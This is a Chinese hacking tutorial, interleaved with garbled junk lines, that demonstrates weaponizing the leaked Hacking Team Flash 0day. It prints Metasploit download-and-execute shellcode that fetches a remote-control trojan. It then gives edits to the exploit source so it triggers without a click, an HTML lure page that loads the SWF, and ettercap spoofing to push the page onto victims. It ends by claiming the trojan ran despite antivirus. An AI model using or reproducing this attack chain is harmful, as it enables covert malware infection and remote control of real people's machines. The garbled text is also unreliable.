|
1 X" l7 j6 H& Q6 ]# I$ _7 p
三、flash 0day之手工代码修改制作下载者实例入侵演示
) ~' s) ?% S, J. ~. C
: a: A& q1 A$ ^1 C- E' V% J3 Y f6 Z; j& w$ z. V
利用到的工具:
+ e$ k k7 R- F* Y 6 ]3 e/ h9 ^6 T4 W# l# ]# o( b9 F
( y: s/ b3 ~. u; U% O+ e
Msf
3 E) L- F" l, J8 n% d9 C: E3 Q! R ) @' ]7 x5 ~: o* [( E! m9 u
2 m$ K' S' L8 A& W
Ettercap ! I1 m! v' j) Z) k: Z
% {' ]+ k' d2 D3 k
/ _, S( @' C) Q
Adobe Flash CS6 $ E X% v7 D( e3 g# O5 ^) v% E$ n: [
7 P5 x! ^/ S' S1 v$ x
) u' v9 E! n3 N5 e
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ' r6 Q4 @8 t, X
8 e0 o C1 E, M5 p) u3 S6 w
W) Q* z4 J$ U7 f7 C+ K9 v 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 1 T; m2 d- |* @1 b+ a. ], w- v" G
6 t v1 V- V- q3 O
! [- g( N/ k" P 如图:
# w0 H1 h( a4 f/ D& C+ [# o3 s! w5 k . R( c. I+ ?8 p; f: t9 J8 E2 ] K
; |6 c7 p% `! X
0 u8 h: _$ B! j, P- _+ w, W
1 v& A( H' u) y- `) P: c- s
! i; D6 w8 t* Z' [4 |& r 2 b3 n. p$ t" c7 J* u/ ]
6 F8 F. A# y4 S$ L0 q# ?' h+ P" q2 j3 X5 Y, s& ^( T4 u# M+ ^
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) F/ U3 T. w# `
, i6 o9 x% C' D2 q' n
* z' G0 W) e K4 I
: z2 C- t: k2 @2 U
+ C9 j) A$ w* l
$ a6 K( j1 H3 t# L1 e9 a
, \+ { E3 s, _* J 1 X. P& G+ ^' l7 O! ]
% t5 W8 O( L, `* E# P% j7 V7 O6 b T7 q 然后执行generate -t dword生成shellcode,如下:
8 O! o/ q, T. T: U/ m: k
7 P! J4 t) n. o2 J" I7 v- p0 z
; F3 Y' x/ f% q( M$ ` ! n/ {" S/ {% C6 t% }' A, ]# ~
: a b- S& U6 U: \& p# C/ V, k( |/ U1 v3 j; w9 Z
复制代码到文本下便于我们一会编辑flash exp,如下: # ?' G9 D+ M# N# U( X* r5 ~
5 V' O" v( Y$ V
$ b5 M* }! _ e# f0 ~$ c" i. n
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 4 I) r: }* j7 i; r9 Z1 L- ]
7 v+ Q6 k; L8 u" e" C- w
$ k+ J: M) r5 T' O9 Y' b
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
: \6 h! G5 ?) d/ l: h # v& @( B9 v n
( N) d/ h: D" s, w
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
# s1 Y- e4 F$ I+ X
/ p8 @ m: e: B2 N: X' v d1 j7 ?7 L4 k* t) E. c) `* w
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, # q; ^& u1 M; R0 z6 y
2 Q; K+ k" s+ u7 c
" }. v$ w+ R; } 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 K# P% F$ s4 Q6 c: o7 j
( C x7 p8 M3 l; L" A
$ o" S7 D6 S7 I! _4 ? 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
$ Y6 ]. ]* [ \; m/ P1 e: g 2 l, C/ X1 ]' Y
' v g; U! M6 b' {/ L1 b& M 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
7 G5 x1 c0 m& |4 k; F. j; r- W0 K
$ B( f/ j* T; T5 e; p* `
4 A4 c% o! w1 Z2 w: D9 n/ f 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
9 F6 @7 P7 X+ r3 H7 j. s
1 i# Z% P4 c3 G. Q& o g+ ^. j
- f) v- g* \8 V 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
) m7 [4 Q J, V2 Y. C ) ?; I9 ?. ~2 D' g: @7 o4 i+ e" h
5 v. j# w2 L8 t) b+ d* _ 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
& I- `1 m# ?8 W7 L 2 c5 v2 Y/ N- z) b8 c8 f* r8 V& x
3 G2 b' \' x$ k$ c5 | 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
' b/ T! y; M+ f$ F5 l2 ~ ) c$ l% T$ }+ D( p
4 _+ g* f# P2 f# d9 N9 y7 j
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + T, [# T* g2 _$ g$ @) O+ b
6 X3 {( p7 n4 `
% O3 a# e( d2 V5 O# U/ @ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 u) _7 P7 G0 C3 N& m" K# n8 @/ `1 F1 U
7 I- @3 u/ O8 k% F" P3 \* X
3 Q: G# h. h3 S5 @& c% X) Y& R( }
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
. `; N1 P5 `) Q& I7 Q, j$ ? / Y* Q. f- x0 S( R- F
8 j( P/ J6 x! y# m
% b! u* `& `: Y, Z2 l# q) V , e5 U% ?- o3 {9 K
; u! Y, ?% [3 h, x; o. u8 a% Q
1 m' Q& p3 j; R. `9 u
/ n* H! m, _6 \ g2 w1 L6 Y( X& R% C% v: M L" ?
下面我们来修改flash 0day exp,需要修改三个文件,分别为: $ g& E) a [0 F7 C
9 G m8 c* T$ x5 \% z. ? O# f
5 X. w6 g: p7 I! h, J% @
% Y$ @) n D& Q1 G/ z
# u* i' k# A. _1 q& k. p# q
. x" I5 j$ V; a; y' ?5 B8 ] 先修改ShellWin32.as,部分源代码如图:
' n- U2 U6 y$ c6 g, Z) _ 5 x$ l0 P( E+ i, _$ Y7 A8 h6 w. Y
: J- L! U' b+ q0 f0 g
' m1 W) n# d; I: l& o* d$ L ( u3 }. f2 @. J) G$ X
C$ @/ x0 \% ~ u$ O3 ]
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
! F. N" `. Z" z ; h' _7 U% U& f V# v6 E! P3 |% p3 p
# l f" H7 I$ U, c$ M
0 `( \" \$ u( T' E3 g0 {. O
& ^) y+ u( F: y9 x7 V' E
! |: c& B1 g, m# T 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 8 \" i# o8 Q% U8 Y
, D. l1 l# |( A! X1 Z; [. O p+ f7 X
% J! a: G+ y& @" b + {1 a# U) q5 h- A% I
9 N% B, } M( a! B8 d6 e& m
: H" q0 m* _' h4 x, M, G1 r7 Q 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 r" V( w% P7 F1 h: |
9 X4 H; ]7 d+ ~" j: X4 B9 U
( o; n! t& a5 F+ e- i( H + R9 V' t+ g& a g6 O0 Y; m/ w* Q
/ V x( b: F6 N, n
" S( `1 u1 Y1 r+ R4 d ' `2 c( U; l& V) W/ [# e1 v
5 P- t' B$ ?" \
7 i7 O3 Y# q, K8 o
. [8 J# G, N+ e( G , @- @1 U* v+ C9 q" J8 B
8 o$ z, r% j! O, d' D
然后点保存,下面我们来编译一下,打开 4 w# h# w& x) l2 h- ^4 A2 V1 n* S
2 `3 _3 F- f) U
, o4 W6 H, w3 H) N5 l exp1.fla然后点文件-发布,看看编译没错误 , i1 }& ?& M8 ]- `/ ?
! d4 Q5 n; t2 Z/ T! H& r, L- f
8 I* v; \, ?/ x: u9 B
2 @) c" r9 Q. y+ x8 F9 a- F1 s1 g
8 e- e: ?' R% e2 |9 K3 n3 T' A; H. [5 o# v1 g, }
, t! p2 Z- |" T: j5 v, x
9 y8 I. A7 a! }3 q I+ X, }7 o/ e" `$ }' f
% g3 C- `% F! Q# _* [
& u. m: Y* J5 _1 v- h: Q+ p/ H4 \
* S! L i6 v4 O9 m
7 J6 o! N# n) v7 y* R6 d 6 w8 K( d/ `5 s% N3 B
; v4 @0 m6 C6 h; E. v
然后我们把生成的
4 D2 J. B# x" y5 d! ` ' @- i( B! g1 P& A/ R% o1 f
' v! t2 Z! L2 Q2 D& v, Y5 w& W& H
exp1.swf丢到kailinux 的/var/www/html下: * `6 b* u' y8 \# a8 h
& f/ Z2 I9 \9 M4 T% P5 z
3 ^& t6 _0 X2 t3 e% C# x+ ^' i
然后把这段代码好好编辑一下 & ?2 _. J+ D# y; k& s0 t i
$ g. W9 S7 h' i8 x' Q1 u7 R' j: A5 T: u% y+ ?. b( ?
0 g3 ` ~% H; L# |; @8 N1 Q " Z8 K: t; j! B/ u, C9 L3 F, _( p" O
8 f5 C9 O& j) p8 s0 E# D. @ ' Z9 u# [6 h* m
1 x0 z; T: ` T) `' }: u7 A- m P
. ?, v8 o! H& F" K
% J5 Z1 v% @9 {6 K0 F % H4 o, E- M- g# e' D" ~
3 p7 X% G y% a4 S. u
- O) a! O- m4 _ 4 C% l2 D: z* P% P+ X: |
' S+ W3 Y# }& ?2 D5 a. l
6 v6 `5 Y4 G5 w; ]5 u7 t F 9 @5 Q3 o1 [) H9 O
: o+ R% m, V+ g/ S* y0 E $ _! A C1 ~% F Y* S1 L
" N7 @, i' T+ d* O& Z: p& R
+ X. }. L' G" D) x <!DOCTYPE html>
) e! y7 L5 @2 p t2 s
$ A0 \( X! Q! N! v \( Z- \* s m3 c3 T
<html>
( l, V: X! O8 S2 T/ x, `4 V8 f" ^ 7 j3 T% w8 l9 K5 ^+ D, j% H( x# \& s
3 j3 i) u ^( I9 i <head> : \1 D9 c6 X9 \) G( Q$ `
3 {/ _- ~# D' j) ?
; b0 w9 d' g; @0 j <meta http-equiv="Content-Type" content="text/html; 7 X; S' S6 i& `0 x( a4 I
5 Q4 C/ O0 p' `' V' j! S) y
! Y+ ^6 z2 p2 |/ U+ L1 P charset=utf-8"/> 5 T! ~6 ]/ B% u- b& F! a0 f
- F. B; @+ u" Y
4 r7 |& K6 D3 P# u
</head> ) }! f% F' h* @, h" F0 z/ b! I' l
) L5 h# `& G) E) i3 h9 }
% c5 |" S- p% w6 W- [. n5 ] <body>
8 z+ i5 `) k0 f1 t3 u
8 s7 l" V( [ y7 o1 H8 r2 [2 R7 h" ~. e4 `# B
<h2> Please wait, the requested page is loading...</h2> 9 W3 ]6 A: J x4 W0 g6 O
/ N( J$ H/ Y3 B4 V/ F5 _" u* }* ~- @. |7 f) Q6 g
<br> ( n0 U) j3 m! R; V+ I$ E
8 d8 Y3 m3 g0 |1 h1 \ t! i
4 b, v2 p/ @& R; ~+ w% @ <OBJECT ! x7 e( r3 A$ Y& L, q
" d$ m; ] Q! x8 \& S( L+ W( @6 g3 m6 Y2 C
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie : z: Z$ k6 P9 T2 g
0 L) J5 m5 W$ q) _4 g
% k, ]0 E# A5 d$ P/ r& u: J6 v VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
' W9 r; a' i! X; i- l0 W9 K . M0 O& K$ m0 H0 b6 x. f. @
; p9 s& _+ w" f# j8 I+ @1 [: E
</body> 5 N0 ~+ c# F+ i' A& U4 P. K; J' u0 A
( `6 P6 F! C8 r7 Z: n7 M3 F7 v+ d
$ t; c8 S2 `& A6 i+ a2 l <script>
: s; k/ ]+ o3 ^3 m6 ~' n8 y
% e5 m; y b3 e! \; b
4 M6 r' i/ y: R( f3 o setTimeout(function () { ' w0 w8 {! Y0 o7 i! P* L; k. T
) p& T$ X* v' L# s) `6 S6 K& ~, ]2 Z p9 f
6 N! L4 u8 \( c& z+ c
4 }! w2 R) }$ x8 c* K
1 k. J* l6 {& t+ e$ v# r window.location.reload();
9 u; r) {+ W% k2 z2 Q5 A 6 L" M8 U: J) W# R6 \, @
5 ~ O( J' _# E
}, 10000);
7 G; ?, H; A9 Z8 }; x; S0 t0 g # b: I, R, D3 l! a. P
; n7 Z8 m# b, o O+ ~( h
- z" e% K5 r6 K8 x2 C; n7 S * \) G( f( t9 W) T9 C* A
0 w7 g; ~6 e3 }# i; `/ j# ^ </script> ; }; V% [ p# s- D: E" Q0 ?) U
! H x7 b/ w \
7 s1 i! b1 l2 u. j; S! x </html>
, t- G ~ J- `/ S: E& E7 r
+ q0 l" f9 L& Q5 i( k: ^
- D3 N' d0 |( i' h! Y% n: T ; A r! l9 [8 w/ _) G) x
A3 c+ x# h7 h" }. G0 Y6 V
) U+ G* F. w' m 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
. Z; U+ a$ s; P. p1 U 8 H7 N8 a2 S* @; K: [/ H4 j, Q
5 I* h; n6 K% n: Y4 s9 c : q `: ?# x4 T3 t9 y1 J
9 N: j. h" t O& e4 T0 V1 n
7 M# q. B* h E j6 Y
" r7 t; }' E" c% N
' C. t% `: t4 { S# V* ^
; k& m4 D! n$ O# p$ j9 K ' u4 S) i M0 o% U8 |/ I* R# L) _
9 ^7 H- |% D) T( a' G" m! ?
1 p; F r" C; r- X2 P. q / `2 ?8 q/ |* _
+ F3 x m, T! c% {* K; c8 U9 O
# `, }2 }2 d3 }3 U, D4 j: Z
' z' l, `' F& C0 f6 B: S; Q
0 j1 r$ a' H; o7 s. q2 L6 K$ B6 A" U1 L8 L' v( E
下面我们用ettercap欺骗如图: 1 p% l( R5 T4 q) d
5 T: y( u( x+ v9 \5 Z C5 [) `' i3 ^+ `& g k
6 t3 Y- d7 O* n4 r6 h5 Q: b5 t
3 ^* c: `& \: B. t6 ~% f4 b
7 R7 a" ~8 o+ \ 8 d5 E7 E& }( `0 b2 U
/ Z, p) M8 R8 z% }0 V1 Q
S8 s# z7 ^/ D: ~8 _% `
下面我们随便访问个网站看看:
; M2 M: |/ M# K/ q
* t$ Q! E' {, s7 m8 a8 {/ O0 f% m: @3 U$ \
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
' n2 M6 R7 _8 \. ~
2 C, a% K {. ]- d' H6 x5 g1 v% v* B9 x$ Z6 F
# e9 {% b! S) W. ^- W0 m! Z0 M 9 u0 G3 W. S/ ^7 V
. E- A2 |( Z1 i1 [8 U% b3 ~
我们看另一台,
/ E- `- n) G8 d) n" T' l
[( |" N/ {+ l* Y2 n
' N$ T3 v: r- j' q 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
& ]4 t X; h" m$ H4 ] _ |